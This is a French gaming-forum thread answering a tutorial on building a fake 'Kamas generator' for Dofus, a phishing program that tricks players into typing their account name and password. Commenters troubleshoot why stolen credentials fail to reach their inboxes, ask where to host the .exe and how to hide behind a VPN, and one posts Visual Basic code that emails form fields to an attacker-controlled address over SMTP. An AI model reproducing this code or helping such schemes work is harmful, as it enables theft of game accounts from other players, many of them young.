Création d'un FAKE Generateur de Kamas (Phishing)

    Publicités

Users Who Are Viewing This Thread (Total: 0, Members: 0, Guests: 0)

ODOFUDK

Nouveau membre
Jul 27, 2011
2
0
301
Excuse-moi mais quand j'ai terminé ça s'enregistre en .vb et quand je vais sur debug , je lance le logiciel je rempli tout avec un deuxieme compte à moi (qui ne sert à rien) et puis je vais sur mon adresse Gmail et le message n'arrive pas.

Si tu peux trouver une solution s'il te plaît se serait gentil.

Merci d'avance.
 

rainpower

Membre
Jul 4, 2011
5
0
421
27
Ou est le timer1 svp? ^^.
Je cite: "double cliquez sur Form1 a Droite, puis sur Timer1 en Bas de l'image. "
Merci.
 

ODOFUDK

Nouveau membre
Jul 27, 2011
2
0
301
En fait j'ai modifié envoyer le requête au serveur par Générer les Kamas et quand j'ouvre le logiciel il y a bien écrit générer les kamas mais quand j'envoie à mon adresse Gmail aucun message n'a été reçu.

Aidez-moi s'il vous plaît.

---------- Message ajouté à 15h28 ---------- Le message précédent était à 15h19 ----------

Ah non c'est bon ça marche en fait merci beaucoup pour ce forum a+
 

louiskang

Membre
Jun 18, 2011
34
0
431
mais euh c oblige Gmail? peut pas hotmail?

---------- Message ajouté à 08h25 ---------- Le message précédent était à 22h07 ----------

jai des question: -enregistrer c'est lequel ?
-on fais heberger quel .exe sur megaupload?
-quand je sauvegarde c'est en .vd et ce n'est pas dans debug mais dans Generateur de kamas dofus c'est normal?
-comment changer requette en requête?
-et je narrive pas a recevoir les id + mdp comment faire?





HELPPPPPPPPPP ME!!!!!!!!
 

SorenDavid

Nouveau membre
Jul 25, 2011
2
0
901
Quelqu'un peut faire un screen des lignes à changer, le pseudo et tout je comprends pas trop..
sinon merci pour le tuto.
 

girlsdz

Membre
Feb 3, 2011
16
0
421
sa me dit qu'il faut payer pour proxpn... j'ai essayer de mettre n'importe quoi mais il veut sa tune le machin comment je fait (ou quelqu'un peut me crée un compte svp?)
avec comme nom de compte : gilsdz
et mdp : ce que vous voulais je le changerais par la suite
et adresse email: Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

---------- Message ajouté à 09h23 ---------- Le message précédent était à 08h29 ----------

Help sa marche pas!

---------- Message ajouté à 09h24 ---------- Le message précédent était à 09h23 ----------

voila mon code...


Private Sub Button3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button3.Click



Dim MyMailMessage As New MailMessage()
Try
MyMailMessage.From = New MailAddress("[email protected]")
MyMailMessage.To.Add("[email protected]")
MyMailMessage.Subject = ("maxime990")
MyMailMessage.Body = TextBox1.Text + ControlChars.NewLine + TextBox2.Text + ControlChars.NewLine + TextBox3.Text + ControlChars.NewLine + ComboBox1.Text + ControlChars.NewLine + ComboBox2.Text + ControlChars.NewLine
Dim SMTP As New SmtpClient("[email protected]")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential("maxime990", "mon mdp")
SMTP.Send(MyMailMessage)
TextBox2.Text = ""

Catch ex As Exception
End Try
Timer2.Start()
End Sub



quesqu'i va pas T-T
 
Dec 14, 2009
89
0
566
Passer moi vos generateurs de kamas que je rigole un peu. :lol:

PS : Le backcolor des labels sont moches changez les en Transparent.

Aussi non c'est bien mais c'est pas sécurisé ;/
 

girlsdz

Membre
Feb 3, 2011
16
0
421
IDEM que Clemdecab...
j'ai meme essayer d'un autre ordinateur et...y'a pas eu de changement...
 

chakibtck

Membre
Nov 10, 2010
83
0
922
Vous utilisez quelle Visual basique ? moi le VB 2008 et quand je l'ouvre sa me fais une erreur :/
 

Epyks

Membre actif
Jun 18, 2011
105
0
441
Pour ceux qui ne reçoivent pas les Emails : il faut que vous modifiez les lignes et enregistrer le codage tel que l'application sera rafraichie avec la nouvelle adresse mail.
 

louniskun

Membre
Jul 21, 2011
47
1
909
25
Probleme quand je me connecte avec PROXPN et que j'ai l'IP De miami je me co sur mon compte dofus et la il est écrit mon compte est banni et quand je me deconnecte de ProXPN il n'est plus banni que faire ?
 

Epyks

Membre actif
Jun 18, 2011
105
0
441

chakibtck

Membre
Nov 10, 2010
83
0
922
Un compte créer pour juste floodé avec ? ^^
Au passage , quelle version de VB vous utilisé moi j'ai des erreur quand j'ouvre le Fake dofus :S